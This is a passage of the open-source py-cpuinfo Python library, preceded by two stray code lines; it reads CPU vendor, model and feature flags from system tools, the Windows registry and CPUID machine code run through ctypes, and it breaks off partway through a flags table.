runner=TaskRunner(task=task)
runner.start()
|
cpuinfo.py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Copyright (c) 2014-2018, Matthew Brennan Jones <matthew.brennan.jones@gmail.com>
# Py-cpuinfo gets CPU info with pure Python 2 & 3
# It uses the MIT License
# It is hosted at: https://github.com/workhorsy/py-cpuinfo
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
CPUINFO_VERSION = (4, 0, 0)
import os, sys
import glob
import re
import time
import platform
import multiprocessing
import ctypes
import pickle
import base64
import subprocess
try:
import _winreg as winreg
except ImportError as err:
try:
import winreg
except ImportError as err:
pass
# Load hacks for Windows
if platform.system().lower() == 'windows':
# Monkey patch multiprocessing's Popen to fork properly on Windows Pyinstaller
# https://github.com/pyinstaller/pyinstaller/wiki/Recipe-Multiprocessing
try:
import multiprocessing.popen_spawn_win32 as forking
except ImportError as err:
try:
import multiprocessing.popen_fork as forking
except ImportError as err:
import multiprocessing.forking as forking
class _Popen(forking.Popen):
def __init__(self, *args, **kw):
if hasattr(sys, 'frozen'):
# We have to set original _MEIPASS2 value from sys._MEIPASS
# to get --onefile mode working.
os.putenv('_MEIPASS2', sys._MEIPASS)
try:
super().__init__(*args, **kw)
finally:
if hasattr(sys, 'frozen'):
# On some platforms (e.g. AIX) 'os.unsetenv()' is not
# available. In those cases we cannot delete the variable
# but only set it to the empty string. The bootloader
# can handle this case.
if hasattr(os, 'unsetenv'):
os.unsetenv('_MEIPASS2')
else:
os.putenv('_MEIPASS2', '')
forking.Popen = _Popen
class DataSource(object):
bits = platform.architecture()[0]
cpu_count = multiprocessing.cpu_count()
is_windows = platform.system().lower() == 'windows'
raw_arch_string = platform.machine()
can_cpuid = True
@staticmethod
def has_proc_cpuinfo():
return os.path.exists('/proc/cpuinfo')
@staticmethod
def has_dmesg():
return len(program_paths('dmesg')) > 0
@staticmethod
def has_var_run_dmesg_boot():
uname = platform.system().strip().strip('"').strip("'").strip().lower()
return 'linux' in uname and os.path.exists('/var/run/dmesg.boot')
@staticmethod
def has_cpufreq_info():
return len(program_paths('cpufreq-info')) > 0
@staticmethod
def has_sestatus():
return len(program_paths('sestatus')) > 0
@staticmethod
def has_sysctl():
return len(program_paths('sysctl')) > 0
@staticmethod
def has_isainfo():
return len(program_paths('isainfo')) > 0
@staticmethod
def has_kstat():
return len(program_paths('kstat')) > 0
@staticmethod
def has_sysinfo():
return len(program_paths('sysinfo')) > 0
@staticmethod
def has_lscpu():
return len(program_paths('lscpu')) > 0
@staticmethod
def has_ibm_pa_features():
return len(program_paths('lsprop')) > 0
@staticmethod
def has_wmic():
returncode, output = run_and_get_stdout(['wmic', 'os', 'get', 'Version'])
return returncode == 0 and len(output) > 0
@staticmethod
def cat_proc_cpuinfo():
return run_and_get_stdout(['cat', '/proc/cpuinfo'])
@staticmethod
def cpufreq_info():
return run_and_get_stdout(['cpufreq-info'])
@staticmethod
def sestatus_allow_execheap():
return run_and_get_stdout(['sestatus', '-b'], ['grep', '-i', '"allow_execheap"'])[1].strip().lower().endswith('on')
@staticmethod
def sestatus_allow_execmem():
return run_and_get_stdout(['sestatus', '-b'], ['grep', '-i', '"allow_execmem"'])[1].strip().lower().endswith('on')
@staticmethod
def dmesg_a():
return run_and_get_stdout(['dmesg', '-a'])
@staticmethod
def cat_var_run_dmesg_boot():
return run_and_get_stdout(['cat', '/var/run/dmesg.boot'])
@staticmethod
def sysctl_machdep_cpu_hw_cpufrequency():
return run_and_get_stdout(['sysctl', 'machdep.cpu', 'hw.cpufrequency'])
@staticmethod
def isainfo_vb():
return run_and_get_stdout(['isainfo', '-vb'])
@staticmethod
def kstat_m_cpu_info():
return run_and_get_stdout(['kstat', '-m', 'cpu_info'])
@staticmethod
def sysinfo_cpu():
return run_and_get_stdout(['sysinfo', '-cpu'])
@staticmethod
def lscpu():
return run_and_get_stdout(['lscpu'])
@staticmethod
def ibm_pa_features():
ibm_features = glob.glob('/proc/device-tree/cpus/*/ibm,pa-features')
if ibm_features:
return run_and_get_stdout(['lsprop', ibm_features[0]])
@staticmethod
def wmic_cpu():
return run_and_get_stdout(['wmic', 'cpu', 'get', 'Name,CurrentClockSpeed,L2CacheSize,L3CacheSize,Description,Caption,Manufacturer', '/format:list'])
@staticmethod
def winreg_processor_brand():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
processor_brand = winreg.QueryValueEx(key, "ProcessorNameString")[0]
winreg.CloseKey(key)
return processor_brand
@staticmethod
def winreg_vendor_id():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
vendor_id = winreg.QueryValueEx(key, "VendorIdentifier")[0]
winreg.CloseKey(key)
return vendor_id
@staticmethod
def winreg_raw_arch_string():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Control\Session Manager\Environment")
raw_arch_string = winreg.QueryValueEx(key, "PROCESSOR_ARCHITECTURE")[0]
winreg.CloseKey(key)
return raw_arch_string
@staticmethod
def winreg_hz_actual():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
hz_actual = winreg.QueryValueEx(key, "~Mhz")[0]
winreg.CloseKey(key)
hz_actual = to_hz_string(hz_actual)
return hz_actual
@staticmethod
def winreg_feature_bits():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
feature_bits = winreg.QueryValueEx(key, "FeatureSet")[0]
winreg.CloseKey(key)
return feature_bits
def obj_to_b64(thing):
a = thing
b = pickle.dumps(a)
c = base64.b64encode(b)
d = c.decode('utf8')
return d
def b64_to_obj(thing):
try:
a = base64.b64decode(thing)
b = pickle.loads(a)
return b
except:
return {}
def run_and_get_stdout(command, pipe_command=None):
if not pipe_command:
p1 = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
output = p1.communicate()[0]
output = output.decode(encoding='UTF-8')
return p1.returncode, output
else:
p1 = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
p2 = subprocess.Popen(pipe_command, stdin=p1.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p1.stdout.close()
output = p2.communicate()[0]
output = output.decode(encoding='UTF-8')
return p2.returncode, output
def program_paths(program_name):
paths = []
exts = filter(None, os.environ.get('PATHEXT', '').split(os.pathsep))
path = os.environ['PATH']
for p in os.environ['PATH'].split(os.pathsep):
p = os.path.join(p, program_name)
if os.access(p, os.X_OK):
paths.append(p)
for e in exts:
pext = p + e
if os.access(pext, os.X_OK):
paths.append(pext)
return paths
def _get_field_actual(cant_be_number, raw_string, field_names):
for line in raw_string.splitlines():
for field_name in field_names:
field_name = field_name.lower()
if ':' in line:
left, right = line.split(':', 1)
left = left.strip().lower()
right = right.strip()
if left == field_name and len(right) > 0:
if cant_be_number:
if not right.isdigit():
return right
else:
return right
return None
def _get_field(cant_be_number, raw_string, convert_to, default_value, *field_names):
retval = _get_field_actual(cant_be_number, raw_string, field_names)
# Convert the return value
if retval and convert_to:
try:
retval = convert_to(retval)
except:
retval = default_value
# Return the default if there is no return value
if retval is None:
retval = default_value
return retval
def _get_hz_string_from_brand(processor_brand):
# Just return 0 if the processor brand does not have the Hz
if not 'hz' in processor_brand.lower():
return (1, '0.0')
hz_brand = processor_brand.lower()
scale = 1
if hz_brand.endswith('mhz'):
scale = 6
elif hz_brand.endswith('ghz'):
scale = 9
if '@' in hz_brand:
hz_brand = hz_brand.split('@')[1]
else:
hz_brand = hz_brand.rsplit(None, 1)[1]
hz_brand = hz_brand.rstrip('mhz').rstrip('ghz').strip()
hz_brand = to_hz_string(hz_brand)
return (scale, hz_brand)
def to_friendly_hz(ticks, scale):
# Get the raw Hz as a string
left, right = to_raw_hz(ticks, scale)
ticks = '{0}.{1}'.format(left, right)
# Get the location of the dot, and remove said dot
dot_index = ticks.index('.')
ticks = ticks.replace('.', '')
# Get the Hz symbol and scale
symbol = "Hz"
scale = 0
if dot_index > 9:
symbol = "GHz"
scale = 9
elif dot_index > 6:
symbol = "MHz"
scale = 6
elif dot_index > 3:
symbol = "KHz"
scale = 3
# Get the Hz with the dot at the new scaled point
ticks = '{0}.{1}'.format(ticks[:-scale-1], ticks[-scale-1:])
# Format the ticks to have 4 numbers after the decimal
# and remove any superfluous zeroes.
ticks = '{0:.4f} {1}'.format(float(ticks), symbol)
ticks = ticks.rstrip('0')
return ticks
def to_raw_hz(ticks, scale):
# Scale the numbers
ticks = ticks.lstrip('0')
old_index = ticks.index('.')
ticks = ticks.replace('.', '')
ticks = ticks.ljust(scale + old_index+1, '0')
new_index = old_index + scale
ticks = '{0}.{1}'.format(ticks[:new_index], ticks[new_index:])
left, right = ticks.split('.')
left, right = int(left), int(right)
return (left, right)
def to_hz_string(ticks):
# Convert to string
ticks = '{0}'.format(ticks)
# Add decimal if missing
if '.' not in ticks:
ticks = '{0}.0'.format(ticks)
# Remove trailing zeros
ticks = ticks.rstrip('0')
# Add one trailing zero for empty right side
if ticks.endswith('.'):
ticks = '{0}0'.format(ticks)
return ticks
def to_friendly_bytes(input):
if not input:
return input
input = "{0}".format(input)
formats = {
r"^[0-9]+B$" : 'B',
r"^[0-9]+K$" : 'KB',
r"^[0-9]+M$" : 'MB',
r"^[0-9]+G$" : 'GB'
}
for pattern, friendly_size in formats.items():
if re.match(pattern, input):
return "{0} {1}".format(input[ : -1].strip(), friendly_size)
return input
def _parse_cpu_string(cpu_string):
# Get location of fields at end of string
fields_index = cpu_string.find('(', cpu_string.find('@'))
#print(fields_index)
# Processor Brand
processor_brand = cpu_string
if fields_index != -1:
processor_brand = cpu_string[0 : fields_index].strip()
#print('processor_brand: ', processor_brand)
fields = None
if fields_index != -1:
fields = cpu_string[fields_index : ]
#print('fields: ', fields)
# Hz
scale, hz_brand = _get_hz_string_from_brand(processor_brand)
# Various fields
vendor_id, stepping, model, family = (None, None, None, None)
if fields:
try:
fields = fields.rsplit('(', 1)[1].split(')')[0].split(',')
fields = [f.strip().lower() for f in fields]
fields = [f.split(':') for f in fields]
fields = [{f[0].strip() : f[1].strip()} for f in fields]
#print('fields: ', fields)
for field in fields:
name = list(field.keys())[0]
value = list(field.values())[0]
#print('name:{0}, value:{1}'.format(name, value))
if name == 'origin':
vendor_id = value.strip('"')
elif name == 'stepping':
stepping = int(value.lstrip('0x'), 16)
elif name == 'model':
model = int(value.lstrip('0x'), 16)
elif name in ['fam', 'family']:
family = int(value.lstrip('0x'), 16)
except:
#raise
pass
return (processor_brand, hz_brand, scale, vendor_id, stepping, model, family)
def _parse_dmesg_output(output):
try:
# Get all the dmesg lines that might contain a CPU string
lines = output.split(' CPU0:')[1:] + \
output.split(' CPU1:')[1:] + \
output.split(' CPU:')[1:] + \
output.split('\nCPU0:')[1:] + \
output.split('\nCPU1:')[1:] + \
output.split('\nCPU:')[1:]
lines = [l.split('\n')[0].strip() for l in lines]
# Convert the lines to CPU strings
cpu_strings = [_parse_cpu_string(l) for l in lines]
# Find the CPU string that has the most fields
best_string = None
highest_count = 0
for cpu_string in cpu_strings:
count = sum([n is not None for n in cpu_string])
if count > highest_count:
highest_count = count
best_string = cpu_string
# If no CPU string was found, return {}
if not best_string:
return {}
processor_brand, hz_actual, scale, vendor_id, stepping, model, family = best_string
# Origin
if ' Origin=' in output:
fields = output[output.find(' Origin=') : ].split('\n')[0]
fields = fields.strip().split()
fields = [n.strip().split('=') for n in fields]
fields = [{n[0].strip().lower() : n[1].strip()} for n in fields]
#print('fields: ', fields)
for field in fields:
name = list(field.keys())[0]
value = list(field.values())[0]
#print('name:{0}, value:{1}'.format(name, value))
if name == 'origin':
vendor_id = value.strip('"')
elif name == 'stepping':
stepping = int(value.lstrip('0x'), 16)
elif name == 'model':
model = int(value.lstrip('0x'), 16)
elif name in ['fam', 'family']:
family = int(value.lstrip('0x'), 16)
#print('FIELDS: ', (vendor_id, stepping, model, family))
# Features
flag_lines = []
for category in [' Features=', ' Features2=', ' AMD Features=', ' AMD Features2=']:
if category in output:
flag_lines.append(output.split(category)[1].split('\n')[0])
flags = []
for line in flag_lines:
line = line.split('<')[1].split('>')[0].lower()
for flag in line.split(','):
flags.append(flag)
flags.sort()
# Convert from GHz/MHz string to Hz
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
if hz_advertised and hz_advertised != '0.0':
info['hz_advertised'] = to_friendly_hz(hz_advertised, scale)
info['hz_actual'] = to_friendly_hz(hz_actual, scale)
if hz_advertised and hz_advertised != '0.0':
info['hz_advertised_raw'] = to_raw_hz(hz_advertised, scale)
info['hz_actual_raw'] = to_raw_hz(hz_actual, scale)
return {k: v for k, v in info.items() if v}
except:
#raise
pass
return {}
def parse_arch(raw_arch_string):
arch, bits = None, None
raw_arch_string = raw_arch_string.lower()
# X86
if re.match('^i\d86$|^x86$|^x86_32$|^i86pc$|^ia32$|^ia-32$|^bepc$', raw_arch_string):
arch = 'X86_32'
bits = 32
elif re.match('^x64$|^x86_64$|^x86_64t$|^i686-64$|^amd64$|^ia64$|^ia-64$', raw_arch_string):
arch = 'X86_64'
bits = 64
# ARM
elif re.match('^armv8-a|aarch64$', raw_arch_string):
arch = 'ARM_8'
bits = 64
elif re.match('^armv7$|^armv7[a-z]$|^armv7-[a-z]$|^armv6[a-z]$', raw_arch_string):
arch = 'ARM_7'
bits = 32
elif re.match('^armv8$|^armv8[a-z]$|^armv8-[a-z]$', raw_arch_string):
arch = 'ARM_8'
bits = 32
# PPC
elif re.match('^ppc32$|^prep$|^pmac$|^powermac$', raw_arch_string):
arch = 'PPC_32'
bits = 32
elif re.match('^powerpc$|^ppc64$|^ppc64le$', raw_arch_string):
arch = 'PPC_64'
bits = 64
# SPARC
elif re.match('^sparc32$|^sparc$', raw_arch_string):
arch = 'SPARC_32'
bits = 32
elif re.match('^sparc64$|^sun4u$|^sun4v$', raw_arch_string):
arch = 'SPARC_64'
bits = 64
return (arch, bits)
def is_bit_set(reg, bit):
mask = 1 << bit
is_set = reg & mask > 0
return is_set
class CPUID(object):
def __init__(self):
self.prochandle = None
# Figure out if SE Linux is on and in enforcing mode
self.is_selinux_enforcing = False
# Just return if the SE Linux Status Tool is not installed
if not DataSource.has_sestatus():
return
# Figure out if we can execute heap and execute memory
can_selinux_exec_heap = DataSource.sestatus_allow_execheap()
can_selinux_exec_memory = DataSource.sestatus_allow_execmem()
self.is_selinux_enforcing = (not can_selinux_exec_heap or not can_selinux_exec_memory)
def _asm_func(self, restype=None, argtypes=(), byte_code=[]):
byte_code = bytes.join(b'', byte_code)
address = None
if DataSource.is_windows:
# Allocate a memory segment the size of the byte code, and make it executable
size = len(byte_code)
# Alloc at least 1 page to ensure we own all pages that we want to change protection on
if size < 0x1000: size = 0x1000
MEM_COMMIT = ctypes.c_ulong(0x1000)
PAGE_READWRITE = ctypes.c_ulong(0x4)
pfnVirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
pfnVirtualAlloc.restype = ctypes.c_void_p
address = pfnVirtualAlloc(None, ctypes.c_size_t(size), MEM_COMMIT, PAGE_READWRITE)
if not address:
raise Exception("Failed to VirtualAlloc")
# Copy the byte code into the memory segment
memmove = ctypes.CFUNCTYPE(ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t)(ctypes._memmove_addr)
if memmove(address, byte_code, size) < 0:
raise Exception("Failed to memmove")
# Enable execute permissions
PAGE_EXECUTE = ctypes.c_ulong(0x10)
old_protect = ctypes.c_ulong(0)
pfnVirtualProtect = ctypes.windll.kernel32.VirtualProtect
res = pfnVirtualProtect(ctypes.c_void_p(address), ctypes.c_size_t(size), PAGE_EXECUTE, ctypes.byref(old_protect))
if not res:
raise Exception("Failed VirtualProtect")
# Flush Instruction Cache
# First, get process Handle
if not self.prochandle:
pfnGetCurrentProcess = ctypes.windll.kernel32.GetCurrentProcess
pfnGetCurrentProcess.restype = ctypes.c_void_p
self.prochandle = ctypes.c_void_p(pfnGetCurrentProcess())
# Actually flush cache
res = ctypes.windll.kernel32.FlushInstructionCache(self.prochandle, ctypes.c_void_p(address), ctypes.c_size_t(size))
if not res:
raise Exception("Failed FlushInstructionCache")
else:
# Allocate a memory segment the size of the byte code
size = len(byte_code)
pfnvalloc = ctypes.pythonapi.valloc
pfnvalloc.restype = ctypes.c_void_p
address = pfnvalloc(ctypes.c_size_t(size))
if not address:
raise Exception("Failed to valloc")
# Mark the memory segment as writeable only
if not self.is_selinux_enforcing:
WRITE = 0x2
if ctypes.pythonapi.mprotect(ctypes.c_void_p(address), size, WRITE) < 0:
raise Exception("Failed to mprotect")
# Copy the byte code into the memory segment
if ctypes.pythonapi.memmove(ctypes.c_void_p(address), byte_code, ctypes.c_size_t(size)) < 0:
raise Exception("Failed to memmove")
# Mark the memory segment as writeable and executable only
if not self.is_selinux_enforcing:
WRITE_EXECUTE = 0x2 | 0x4
if ctypes.pythonapi.mprotect(ctypes.c_void_p(address), size, WRITE_EXECUTE) < 0:
raise Exception("Failed to mprotect")
# Cast the memory segment into a function
functype = ctypes.CFUNCTYPE(restype, *argtypes)
fun = functype(address)
return fun, address
def _run_asm(self, *byte_code):
# Convert the byte code into a function that returns an int
restype = ctypes.c_uint32
argtypes = ()
func, address = self._asm_func(restype, argtypes, byte_code)
# Call the byte code like a function
retval = func()
byte_code = bytes.join(b'', byte_code)
size = ctypes.c_size_t(len(byte_code))
# Free the function memory segment
if DataSource.is_windows:
MEM_RELEASE = ctypes.c_ulong(0x8000)
ctypes.windll.kernel32.VirtualFree(ctypes.c_void_p(address), ctypes.c_size_t(0), MEM_RELEASE)
else:
# Remove the executable tag on the memory
READ_WRITE = 0x1 | 0x2
if ctypes.pythonapi.mprotect(ctypes.c_void_p(address), size, READ_WRITE) < 0:
raise Exception("Failed to mprotect")
ctypes.pythonapi.free(ctypes.c_void_p(address))
return retval
# FIXME: We should not have to use different instructions to
# set eax to 0 or 1, on 32bit and 64bit machines.
def _zero_eax(self):
return (
b"\x31\xC0" # xor eax,eax
)
def _zero_ecx(self):
return (
b"\x31\xC9" # xor ecx,ecx
)
def _one_eax(self):
return (
b"\xB8\x01\x00\x00\x00" # mov eax,0x1"
)
# http://en.wikipedia.org/wiki/CPUID#EAX.3D0:_Get_vendor_ID
def get_vendor_id(self):
# EBX
ebx = self._run_asm(
self._zero_eax(),
b"\x0F\xA2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
self._zero_eax(),
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# EDX
edx = self._run_asm(
self._zero_eax(),
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# Each 4bits is a ascii letter in the name
vendor_id = []
for reg in [ebx, edx, ecx]:
for n in [0, 8, 16, 24]:
vendor_id.append(chr((reg >> n) & 0xFF))
vendor_id = ''.join(vendor_id)
return vendor_id
# http://en.wikipedia.org/wiki/CPUID#EAX.3D1:_Processor_Info_and_Feature_Bits
def get_info(self):
# EAX
eax = self._run_asm(
self._one_eax(),
b"\x0f\xa2" # cpuid
b"\xC3" # ret
)
# Get the CPU info
stepping = (eax >> 0) & 0xF # 4 bits
model = (eax >> 4) & 0xF # 4 bits
family = (eax >> 8) & 0xF # 4 bits
processor_type = (eax >> 12) & 0x3 # 2 bits
extended_model = (eax >> 16) & 0xF # 4 bits
extended_family = (eax >> 20) & 0xFF # 8 bits
return {
'stepping' : stepping,
'model' : model,
'family' : family,
'processor_type' : processor_type,
'extended_model' : extended_model,
'extended_family' : extended_family
}
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000000h:_Get_Highest_Extended_Function_Supported
def get_max_extension_support(self):
# Check for extension support
max_extension_support = self._run_asm(
b"\xB8\x00\x00\x00\x80" # mov ax,0x80000000
b"\x0f\xa2" # cpuid
b"\xC3" # ret
)
return max_extension_support
# http://en.wikipedia.org/wiki/CPUID#EAX.3D1:_Processor_Info_and_Feature_Bits
def get_flags(self, max_extension_support):
# EDX
edx = self._run_asm(
self._one_eax(),
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
self._one_eax(),
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the CPU flags
flags = {
'fpu' : is_bit_set(edx, 0),
'vme' : is_bit_set(edx, 1),
'de' : is_bit_set(edx, 2),
'pse' : is_bit_set(edx, 3),
'tsc' : is_bit_set(edx, 4),
'msr' : is_bit_set(edx, 5),
'pae' : is_bit_set(edx, 6),
'mce' : is_bit_set(edx, 7),
'cx8' : is_bit_set(edx, 8),
'apic' : is_bit_set(edx, 9),
#'reserved1' : is_bit_set(edx, 10),
'sep' : is_bit_set(edx, 11),
'mtrr' : is_bit_set(edx, 12),
'pge' : is_bit_set(edx, 13),
'mca' : is_bit_set(edx, 14),
'cmov' : is_bit_set(edx, 15),
'pat' : is_bit_set(edx, 16),
'pse36' : is_bit_set(edx, 17),
'pn' : is_bit_set(edx, 18),
'clflush' : is_bit_set(edx, 19),
#'reserved2' : is_bit_set(edx, 20),
'dts' : is_bit_set(edx, 21),
'acpi' : is_bit_set(edx, 22),
'mmx' : is_bit_set(edx, 23),
'fxsr' : is_bit_set(edx, 24),
'sse' : is_bit_set(edx, 25),
'sse2' : is_bit_set(edx, 26),
'ss' : is_bit_set(edx, 27),
'ht' : is_bit_set(edx, 28),
'tm' : is_bit_set(edx, 29),
'ia64' : is_bit_set(edx, 30),
'pbe' : is_bit_set(edx, 31),
'pni' : is_bit_set(ecx, 0),
'pclmulqdq' : is_bit_set(ecx, 1),
'dtes64' : is_bit_set(ecx, 2),
'monitor' : is_bit_set(ecx, 3),
'ds_cpl' : is_bit_set(ecx, 4),
'vmx' : is_bit_set(ecx, 5),
'smx' : is_bit_set(ecx, 6),
'est' : is_bit_set(ecx, 7),
'tm2' : is_bit_set(ecx, 8),
'ssse3' : is_bit_set(ecx, 9),
'cid' : is_bit_set(ecx, 10),
#'reserved3' : is_bit_set(ecx, 11),
'fma' : is_bit_set(ecx, 12),
'cx16' : is_bit_set(ecx, 13),
'xtpr' : is_bit_set(ecx, 14),
'pdcm' : is_bit_set(ecx, 15),
#'reserved4' : is_bit_set(ecx, 16),
'pcid' : is_bit_set(ecx, 17),
'dca' : is_bit_set(ecx, 18),
'sse4_1' : is_bit_set(ecx, 19),
'sse4_2' : is_bit_set(ecx, 20),
'x2apic' : is_bit_set(ecx, 21),
'movbe' : is_bit_set(ecx, 22),
'popcnt' : is_bit_set(ecx, 23),
'tscdeadline' : is_bit_set(ecx, 24),
'aes' : is_bit_set(ecx, 25),
'xsave' : is_bit_set(ecx, 26),
'osxsave' : is_bit_set(ecx, 27),
'avx' : is_bit_set(ecx, 28),
'f16c' : is_bit_set(ecx, 29),
'rdrnd' : is_bit_set(ecx, 30),
'hypervisor' : is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
# http://en.wikipedia.org/wiki/CPUID#EAX.3D7.2C_ECX.3D0:_Extended_Features
if max_extension_support >= 7:
# EBX
ebx = self._run_asm(
self._zero_ecx(),
b"\xB8\x07\x00\x00\x00" # mov eax,7
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
self._zero_ecx(),
b"\xB8\x07\x00\x00\x00" # mov eax,7
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the extended CPU flags
extended_flags = {
#'fsgsbase' : is_bit_set(ebx, 0),
#'IA32_TSC_ADJUST' : is_bit_set(ebx, 1),
'sgx' : is_bit_set(ebx, 2),
'bmi1' : is_bit_set(ebx, 3),
'hle' : is_bit_set(ebx, 4),
'avx2' : is_bit_set(ebx, 5),
#'reserved' : is_bit_set(ebx, 6),
'smep' : is_bit_set(ebx, 7),
'bmi2' : is_bit_set(ebx, 8),
'erms' : is_bit_set(ebx, 9),
'invpcid' : is_bit_set(ebx, 10),
'rtm' : is_bit_set(ebx, 11),
'pqm' : is_bit_set(ebx, 12),
#'FPU CS and FPU DS deprecated' : is_bit_set(ebx, 13),
'mpx' : is_bit_set(ebx, 14),
'pqe' : is_bit_set(ebx, 15),
'avx512f' : is_bit_set(ebx, 16),
'avx512dq' : is_bit_set(ebx, 17),
'rdseed' : is_bit_set(ebx, 18),
'adx' : is_bit_set(ebx, 19),
'smap' : is_bit_set(ebx, 20),
'avx512ifma' : is_bit_set(ebx, 21),
'pcommit' : is_bit_set(ebx, 22),
'clflushopt' : is_bit_set(ebx, 23),
'clwb' : is_bit_set(ebx, 24),
'intel_pt' : is_bit_set(ebx, 25),
'avx512pf' : is_bit_set(ebx, 26),
'avx512er' : is_bit_set(ebx, 27),
'avx512cd' : is_bit_set(ebx, 28),
'sha' : is_bit_set(ebx, 29),
'avx512bw' : is_bit_set(ebx, 30),
'avx512vl' : is_bit_set(ebx, 31),
'prefetchwt1' : is_bit_set(ecx, 0),
'avx512vbmi' : is_bit_set(ecx, 1),
'umip' : is_bit_set(ecx, 2),
'pku' : is_bit_set(ecx, 3),
'ospke' : is_bit_set(ecx, 4),
#'reserved' : is_bit_set(ecx, 5),
'avx512vbmi2' : is_bit_set(ecx, 6),
#'reserved' : is_bit_set(ecx, 7),
'gfni' : is_bit_set(ecx, 8),
'vaes' : is_bit_set(ecx, 9),
'vpclmulqdq' : is_bit_set(ecx, 10),
'avx512vnni' : is_bit_set(ecx, 11),
'avx512bitalg' : is_bit_set(ecx, 12),
#'reserved' : is_bit_set(ecx, 13),
'avx512vpopcntdq' : is_bit_set(ecx, 14),
#'reserved' : is_bit_set(ecx, 15),
#'reserved' : is_bit_set(ecx, 16),
#'mpx0' : is_bit_set(ecx, 17),
#'mpx1' : is_bit_set(ecx, 18),
#'mpx2' : is_bit_set(ecx, 19),
#'mpx3' : is_bit_set(ecx, 20),
#'mpx4' : is_bit_set(ecx, 21),
'rdpid' : is_bit_set(ecx, 22),
#'reserved' : is_bit_set(ecx, 23),
#'reserved' : is_bit_set(ecx, 24),
#'reserved' : is_bit_set(ecx, 25),
#'reserved' : is_bit_set(ecx, 26),
#'reserved' : is_bit_set(ecx, 27),
#'reserved' : is_bit_set(ecx, 28),
#'reserved' : is_bit_set(ecx, 29),
'sgx_lc' : is_bit_set(ecx, 30),
#'reserved' : is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
extended_flags = [k for k, v in extended_flags.items() if v]
flags += extended_flags
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000001h:_Extended_Processor_Info_and_Feature_Bits
if max_extension_support >= 0x80000001:
# EBX
ebx = self._run_asm(
b"\xB8\x01\x00\x00\x80" # mov ax,0x80000001
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
b"\xB8\x01\x00\x00\x80" # mov ax,0x80000001
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the extended CPU flags
extended_flags = {
'fpu' : is_bit_set(ebx, 0),
'vme' : is_bit_set(ebx, 1),
'de' : is_bit_set(ebx, 2),
'pse' : is_bit_set(ebx, 3),
'tsc' : is_bit_set(ebx, 4),
'msr' : is_bit_set(ebx, 5),
'pae' : is_bit_set(ebx, 6),
'mce' : is_bit_set(ebx, 7),
'cx8' : is_bit_set(ebx, 8),
'apic' : is_bit_set(ebx, 9),
#'reserved' : is_bit_set(ebx, 10),
'syscall' : is_bit_set(ebx, 11),
'mtrr' : is_bit_set(ebx, 12),
'pge' : is_bit_set(ebx, 13),
'mca' : is_bit_set(ebx, 14),
'cmov' : is_bit_set(ebx, 15),
'pat' : is_bit_set(ebx, 16),
'pse36' : is_bit_set(ebx, 17),
#'reserved' : is_bit_set(ebx, 18),
'mp' : is_bit_set(ebx, 19),
'nx' : is_bit_set(ebx, 20),
#'reserved' : is_bit_set(ebx, 21),
'mmxext' : is_bit_set(ebx, 22),
'mmx' : is_bit_set(ebx, 23),
'fxsr' : is_bit_set(ebx, 24),
'fxsr_opt' : is_bit_set(ebx, 25),
'pdpe1gp' : is_bit_set(ebx, 26),
'rdtscp' : is_bit_set(ebx, 27),
#'reserved' : is_bit_set(ebx, 28),
'lm' : is_bit_set(ebx, 29),
'3dnowext' : is_bit_set(ebx, 30),
